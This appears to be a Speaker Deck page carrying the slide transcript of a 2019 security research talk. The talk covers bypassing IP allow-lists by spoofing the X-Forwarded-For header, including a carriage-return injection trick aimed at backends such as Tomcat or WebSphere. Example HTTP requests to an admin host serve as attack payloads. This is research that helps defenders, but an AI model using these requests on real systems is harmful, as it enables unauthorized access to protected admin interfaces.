$30 off During Our Annual Pro Sale. View Details »

At Home Among Strangers

Bo0oM
December 06, 2019
Research
1
3.3k

At Home Among Strangers

Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.

Bo0oM

December 06, 2019
Tweet

More Decks by Bo0oM

See All by Bo0oM
Защита от вредоносной автоматизации сегодня
bo0om
0
370
Defending against automatization using nginx
bo0om
0
630
Antibot pitch deck
bo0om
0
89
31337
bo0om
0
76
Your back is white
bo0om
0
200
FTP2RCE
bo0om
0
6.4k
Interpret it!
bo0om
0
980
2000day in Safari
bo0om
2
2k
Partyhack 3.0 - Telegram bugbounty writeup
bo0om
0
3.9k

Other Decks in Research

See All in Research
Pathfinding for 10k agents
kei18
0
110
Hyena Hierarchy: Towards Larger Convolutional Language Models
hpprc
3
880
旅行記から地図へ:文章から旅の軌跡を取り出して地図上に描く
hiroki13
1
160
大規模言語モデル入門 / LLM introduction (SES2023)
kyoun
8
2.8k
⼤規模⾔語モデルとVision-and-Language
kosuken
6
1.2k
Volume Expression GGX(Microfacet)
kinakomoti321
1
880
Open Source Software Resilience and Epistemic Analysis
apostoloskritikos
0
130
マルチモーダルLLMの応用動向の論文調査
masatoto
6
850
Elix, CBI 2023, フォーカストセッション, 生成モデルを中心としたElixにおけるAI創薬
elix
0
140
FINN (Fire INventory from NCAR)のための地理情報処理:山火事からの大気汚染物質排出量の推計
yosukefk
0
330
[CVPR 2023 論文紹介] Unifying Vision, Text, and Layout for Universal Document Processing / kanto-cv-59-udop
shimacos
3
550
SNLP2023: When and Why Vision-Language Models Behave like Bags-Of-Words, and What to Do About It?
muraoka7
0
150

Featured

See All Featured
Building Applications with DynamoDB
mza
87
5.3k
Designing for humans not robots
tammielis
246
24k
A better future with KSS
kneath
230
16k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
5
750
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
101
6.4k
Why You Should Never Use an ORM
jnunemaker
PRO
49
8.3k
How to Ace a Technical Interview
jacobian
272
22k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
54
33k
Designing on Purpose - Digital PM Summit 2013
jponch
108
6.2k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
0
2.7k
Being A Developer After 40
akosma
52
580k
VelocityConf: Rendering Performance Case Studies
addyosmani
319
23k

Transcript

  1. At Home Among
    Strangers
    Bypassing IP white sheets of some web applications
    due to incorrect parsing of HTTP request headers.

    View Slide

  2. Reverse Proxy

    View Slide

  3. View Slide

  4. X-Forwarded-For: ,
    X-Forwarded-For: , ,

    View Slide

  5. HTTP-request
    GET / HTTP/1.1

    Host: admin.my.site

    Connection: close
    GET / HTTP/1.1

    Host: admin.my.site

    X-Forwarded-For: 123.123.123.123, 192.168.1.1

    Connection: close
    X-Forwarded-For: ,

    View Slide

  6. XFF/XRI Spoofing
    GET / HTTP/1.1

    Host: admin.my.site
    X-Forwarded-For: 127.0.0.1

    Connection: close
    GET / HTTP/1.1

    Host: admin.my.site

    X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1

    Connection: close
    X-Forwarded-For: , ,

    View Slide

  7. HTTP-request
    GET / HTTP/1.1\r\n

    Host: admin.my.site\r\n

    X-Forwarded-For: 127.0.0.1\r\n

    Connection: close\r\n
    \r\n
    X-Forwarded-For: , ,

    View Slide

  8. HTTP-request with 0d
    GET / HTTP/1.1\r\n

    Host: admin.my.site\r\n

    X-Forwarded-For: 127.0.0.1\r\r\n

    Connection: close\r\n
    \r\n
    X-Forwarded-For: \r, ,

    View Slide

  9. XFF/XRI Spoofing+
    GET / HTTP/1.1\r\n

    Host: admin.my.site\r\n

    X-Forwarded-For: 127.0.0.1\r\r\n

    Connection: close\r\n
    \r\n
    GET / HTTP/1.1

    Host: admin.my.site

    X-Forwarded-For: 127.0.0.1
    , 123.123.123.123, 192.168.1.1

    Connection: close
    X-Forwarded-For:
    , ,
    Tomcat?
    WebSphere?

    View Slide

  10. Twi: @i_bo0om
    Site: bo0om.ru
    Telegram: @webpwn

    View Slide